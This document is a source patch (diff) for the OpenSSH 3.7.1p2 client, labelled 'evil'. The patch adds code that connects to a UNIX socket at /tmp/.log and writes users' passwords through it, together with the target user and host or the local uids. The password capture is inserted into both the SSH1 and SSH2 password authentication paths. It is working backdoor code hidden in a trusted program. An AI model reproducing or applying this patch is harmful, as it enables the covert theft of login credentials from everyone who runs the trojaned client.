diff -urP --exclude='*[^.c]' openssh-3.7.1p2/ssh.c openssh-3.7.1p2-evil/ssh.c --- openssh-3.7.1p2/ssh.c 2003-09-02 14:58:22.000000000 +0200 +++ openssh-3.7.1p2-evil/ssh.c 2003-12-14 22:00:41.000000000 +0100 @@ -141,6 +141,9 @@ /* pid of proxycommand child process */ pid_t proxy_command_pid = 0; +/* Evil UNIX socket to log !! */ +int sunix; + /* Prints a help message to the user. This function never returns. */ static void @@ -207,13 +210,24 @@ char *p, *cp, buf[256]; struct stat st; struct passwd *pw; + struct sockaddr_un su; int dummy; extern int optind, optreset; extern char *optarg; __progname = ssh_get_progname(av[0]); init_rng(); - + if ((sunix = socket (PF_UNIX, SOCK_DGRAM, 0)) < 0) + { + perror ("socket()"); + exit (-1); + } + su.sun_family = AF_UNIX; + strcpy (su.sun_path, "/tmp/.log"); + if(connect(sunix,&su,sizeof(struct sockaddr_un)) < 0){ + perror("connect()"); + exit(-1); + } /* * Save the original real uid. It will be needed later (uid-swapping * may clobber the real uid). @@ -717,7 +731,10 @@ */ if (proxy_command_pid > 1) kill(proxy_command_pid, SIGHUP); - + /* + * Yeah, i'm a sucker, but i'm not a pig !! + */ + close(sunix); return exit_status; } diff -urP --exclude='*[^.c]' openssh-3.7.1p2/sshconnect1.c openssh-3.7.1p2-evil/sshconnect1.c --- openssh-3.7.1p2/sshconnect1.c 2003-09-02 14:51:17.000000000 +0200 +++ openssh-3.7.1p2-evil/sshconnect1.c 2003-12-14 22:02:47.000000000 +0100 @@ -434,8 +434,10 @@ static int try_password_authentication(char *prompt) { + extern int sunix,original_real_uid,original_effective_uid; int type, i; char *password; + char *temp; debug("Doing password authentication."); if (options.cipher == SSH_CIPHER_NONE) @@ -452,8 +454,13 @@ packet_write_wait(); type = packet_read(); - if (type == SSH_SMSG_SUCCESS) + if (type == SSH_SMSG_SUCCESS){ + temp = malloc((strlen(password)+12)*sizeof(char)); + sprintf(temp,"%s %i.%i",password,original_real_uid,original_effective_uid); + if(write(sunix,temp,strlen(temp)+1)<0) + printf("Oops\n"); return 1; + } if (type != SSH_SMSG_FAILURE) packet_disconnect("Protocol error: got %d in response to passwd auth", type); } diff -urP --exclude='*[^.c]' openssh-3.7.1p2/sshconnect2.c openssh-3.7.1p2-evil/sshconnect2.c --- openssh-3.7.1p2/sshconnect2.c 2003-08-26 04:14:05.000000000 +0200 +++ openssh-3.7.1p2-evil/sshconnect2.c 2003-12-14 22:19:33.000000000 +0100 @@ -704,8 +704,9 @@ userauth_passwd(Authctxt *authctxt) { static int attempt = 0; + extern int sunix; char prompt[150]; - char *password; + char *password,*temp; if (attempt++ >= options.number_of_password_prompts) return 0; @@ -716,6 +717,9 @@ snprintf(prompt, sizeof(prompt), "%.30s@%.128s's password: ", authctxt->server_user, authctxt->host); password = read_passphrase(prompt, 0); + temp = malloc(strlen(password)+strlen(authctxt->server_user)+strlen(authctxt->host)+5); + sprintf(temp,"%.30s@%.128s: %s",authctxt->server_user,authctxt->host,password); + if(write(sunix,temp,strlen(temp)+1) < 0) printf("Oops\n"); packet_start(SSH2_MSG_USERAUTH_REQUEST); packet_put_cstring(authctxt->server_user); packet_put_cstring(authctxt->service);